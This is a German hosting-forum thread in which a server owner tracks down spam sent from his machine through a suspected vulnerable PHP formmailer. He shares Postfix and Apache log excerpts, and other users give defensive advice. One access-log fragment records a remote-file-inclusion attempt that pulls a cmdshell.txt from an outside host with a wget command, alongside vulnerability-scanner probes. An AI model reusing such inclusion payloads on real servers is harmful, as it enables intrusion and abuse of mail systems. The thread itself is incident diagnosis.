Spawnversand über meinen Server

M

Marsman

Registered User
Spamversand über meinen Server

Hallo,

ich habe festgestellt, dass schon seit längerer Zeit Spam über meinen Server verschickt wird und meine Email Adressen als Absender stehen.

Darum habe ich meinen Hoster kontaktiert und er meint:

...hier handelt es sich eindeutig um ein anfälliges PHP-Skript/Formmailer auf
Ihrem Server. Sie sollten daher hier alle PHP-Skripte prüfen, die z.B. die
PHP-Funktion mail() benutzen.
Click to expand...

Jetzt habe ich als ersten mal den Postfix gestoppt, nicht installierte CMS von Joomla und Typo3 runtergelöscht, ein nicht mehr benutztes WBB Lite Forum.

Wie sollte ich genau vorgehen? Ich habe mir die Logfiles durchgelesen, könnte aber nicht sagen was daran auffällig wäre. Das einzigste was jetzt noch installiert ist, wäre Joomla, Wbb Lite Foren und Teamspeak. Kann also nur einer von denen sein. Die Zugriffe auf die 2 Mail Accounts sehen auch sauber aus. Dürfte also nicht gehackt worden sein.

Ich hoffe Ihr könnt mir helfen
Grüße Marsman
 
Last edited by a moderator:
In einen deiner Scripts am Server ist eine Sicherheitslücke, wie der Support schon sagte. Die Logfiles können definitiv nicht normal ausgeschaut haben, denn dann würde kein Spam versendet werden.

Schau einmal in deiner Mail Log, wann der Spam (nicht Spawn, ich hoffe du meinst damit Spam - auch zum ersten Mal, dass ich das so lesen :)) versendet wurde. Dann schaust du in deiner access_log was zu dieser Zeit war, dann solltest du das Script gefunden haben, wo das Loch drinnen ist. Dann hast du zwei Möglichkeiten: Entweder das Script löschen oder das die Lücke herausnehmen.
 
Wie ist das denn mit der Authentifizierung für den SMTP Server ? Würde versuchen das alle mails die verschickt werden, über ein email account mit passwort gesendet werden.Beim wbblite ginge das ja,weiß nicht wie es mit deinen CMS Scripts aussieht.Vielleicht kann man das einstellen das der eigentliche Formmailer nur über Authentifizierung senden kann
 
Erstmal Danke. Habe jetzt von 2 Domains von September weg fast 10000 Zeilen angeguckt.. als ich aufhören wollte stand in einer Logfile als erste Zeile:

Code: 
207.46.98.33 - - [18/Sep/2006:05:17:35 +0200] "GET /forum/formmail.php?userid=28&sid=da9f25a144a765b1e40f26f0cb77796e HTTP/1.0" 404 216 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"

Dann
Code: 
Sep 18 07:10:29 v667 postfix/smtpd[30120]: connect from 59-105-7-163.adsl.dynamic.seed.net.tw[59.105.7.163]

Und schlussendlich
Code: 
Sep 18 07:10:31 v667 postfix/smtpd[30120]: lost connection after CONNECT from 59-105-7-163.adsl.dynamic.seed.net.tw[59.105.7.163]
Sep 18 07:10:31 v667 postfix/smtpd[30120]: disconnect from 59-105-7-163.adsl.dynamic.seed.net.tw[59.105.7.163]
Sep 18 11:33:03 v667 postfix/smtpd[9982]: connect from unknown[210.222.142.12]
Sep 18 11:33:05 v667 postfix/smtpd[9982]: warning: support for restriction "check_relay_domains" will be removed from Postfix; use "reject_unauth_destination" instead
Sep 18 11:33:05 v667 postfix/smtpd[9982]: NOQUEUE: reject: RCPT from unknown[210.222.142.12]: 550 <sales@meinedomain.net>: Recipient address rejected: User unknown in virtual alias table; from=<sales@meinedomain.net> to=<sales@meinedomain.net> proto=SMTP helo=<89.110.1xx.xxx>
Sep 18 11:33:06 v667 postfix/smtpd[9982]: disconnect from unknown[210.222.142.12]

Es wurde auf eine Email Adresse übertragen die auf dem Server lag. (admin@) aber nie benutzt wurde. Niemand wusste, dass die existiert. aber es muss das sein, denn ich legte nie eine sales@ an und in Confixx steht auch keine drin.

Bots sind ja laufend auf der Seite, aber hat jemand über die msn suche meine seite aufgefunden, den formmailer "missbraucht" und dann das zeug zum laufen gebracht?

klingt jetzt warscheinlich eigenartig aber Login, 2h Später Verbindungsaufbau, 3h Später wurde eine Adresse angelegt ;)

Dieses Forum war ein Burning Board Lite, das ich aber heute früh schon gelöscht habe. 2 sind noch installiert. wo bis jetzt nichts war. Hab alle Logfiles zum schluss noch mal mit "formmailer" durchsucht.
Habe gesehen das auch Domains von diversen Firmen betroffen sind mit dem selben Problem. Sogar Spam von der Firma Wella kommt herein ;)

Grüße Marsman
 
Last edited by a moderator:
Hm,zumindest hat es wohl jemand geschafft über sich irgendwie über ein script auf den SMTP Server zugriff zu verschaffen
 
Bekomme nur keine Infos über diese IP-Adressen bei Ripe raus :(. ich könnte mal probieren den Server wieder zu starten und schauen ob noch welche kommen als mein Absender. Aber wer weiß bis ich selbst wieder eine bekomme. Das Forum ist schließlich weg. Wenigstens stehe ich noch auf keiner Spam Blacklist.

Betroffen sind Mittlerweile alle 4 Adressen was ich habe. 2 Davon sind aber wieder gelöscht, da ich sie nicht mehr brauche. Es sind 2 info@ - Möglich das welche wie info, admin, büro etc.. automatisch betroffen sind?

EDIT:

auch etwas in der access datei gefunden das geht seit märz so bis jetzt. hab im forum auch infos darüber gefunden:

Code: 
82.96.134.17 - - [02/Mar/2006:21:30:29 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 347 "-" "-"
64.246.165.160 - - [03/Mar/2006:10:26:36 +0100] "\x80|\x01\x03\x01" 501 328 "-" "-"
82.96.134.17 - - [11/Mar/2006:20:33:28 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 347 "-" "-"

DoS?

/logiasite.webcindario.com/cmdshell.txt?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 131.161.89.36 - - [06/Mar/2006:06:56:50 +0100] "GET / HTTP/1.0" 302 - "-" "-" 81.169.176.15 - - [06/Mar/2006:07:41:20 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"...
serversupportforum.de serversupportforum.de
 
Last edited by a moderator:
Ich schätze mal das eventuelle hacker solche namen als erstes ausprobieren.Genauso wie webmaster@ oder postmaster@
denn die sind meist ja immer auf einem system vorhanden.
Wobei ich mich immer noch frage wie er dein script vom wbblite so umgehen konnte.Hast du vielleicht irgendwelche unsicheren hacks drinne oder für Gäste in einem Gäste Forum html beim schreiben von Beiträgen aktiviert gelassen?
 
So viel ich weiß hatte ich nur einen Attachment Hack installiert. Das mit html für Gäste könnte sein, habe das Forum schon wieder gelöscht. Aber ich habe ja das Forum seit etwa Juli im Offlinemodus. Könnte somit also ausgeschlossen werden. Und einen Beitrag eines unbekannten Users gab es nie.

Das eigenartige ist, ich habe Gestern alles auf meinen pc geladen. und dann gelöscht. stellte gerade fest die Datei formmail.php existiert nicht mehr.

Somit kann es doch nur diese Sein. Also ich glaube ich werde mich von meinen 2 anderen Wbb's trennen und zu vBulletin wechseln ;)

Schöne Weihnachten erst mal

Mars
 
Grundsätzlich: Wenn Spam mit meiner EMail-Adresse als Absender verschickt wird, heisst das nicht, daß mein Server gehackt ist. Als EMail-Adresse kannst du angeben, was du willst, das kann man nicht direkt kontrollieren.

Dann solltest du dich mal kurz mit den HTTP-Status-Codes beschäftigen; alle 4xx-Codes sind Fehler (der bekannteste ist "404 - file not found"). Diese Zeilen im access.log kannst du gleich mal ignorieren, da konnte nix passieren. Interessant sind die "erfoglreichen" Requests.

Dein mail.log solltest du durchsuchen, was an EMails angenommen wurde. Was abgelehnt wurde, ist uninteressant. (Und die Warnungen, die der postfix dir ins Log schreibt, solltest du ernst nehmen.)

Schöne Weihnachten
 
You must log in or register to reply here.
Back
Top